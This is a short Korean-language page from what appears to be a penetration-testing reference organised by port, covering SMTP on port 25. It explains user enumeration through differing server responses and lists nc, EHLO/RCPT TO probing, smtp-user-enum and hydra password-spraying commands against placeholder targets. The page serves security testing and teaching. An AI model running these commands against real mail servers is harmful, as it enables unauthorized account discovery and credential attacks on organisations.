25 - smtp

SMTP는 1982년 개발되어 현재까지도 메일 서버 간의 전송을 위해 사용되는 프로토콜입니다.

외부에서 내부로 이메일을 전송했을 때, 서버는 클라이언트가 전송한 수신자가 로컬 데이터베이스 목록에 존재하는지 확인하고 그에 대한 응답을 반환합니다.

이러한 응답의 차이로 인해 공격자는 실제 존재하는 사용자 이메일 목록 탈취가 가능합니다.

SMTP 프로토콜을 사용하는 서버가 독립된 메일 시스템이라면 계정정보를 획득하더라도, 이는 시스템 계정이 아닌 메일 서비스 계정에 불과합니다.

하지만 AD 통합 환경의 경우 대부분 Exchange Server, Wifi, 시스템, 그룹웨어 등 회사 대부분의 서비스와 자산이 동일한 계정정보로 통합되어 있기 때문에 크리덴셜 스터핑 공격에 활용할 수 있습니다.

Abuse

# smtp 연결 이후 존재하는 계정 확인
nc '<smtp-server-address>' 25

# 기능 열거
EHLO test

# 메일 전송을 통한 사용자 이메일 계정 확인
MAIL FROM:[email protected]
RCPT TO:root@'<target-domain>'

# 자동화 도구
smtp-user-enum -M VRFY -U username.txt -t '<smtp-server-address>' -p 25

# hydra
hydra -L username.txt -p password123 smtp://'<smtp-server-address>' -s 25

Previous23 - telnet Next53 - dns

Last updated 47 minutes ago

hashtagAbuse

Abuse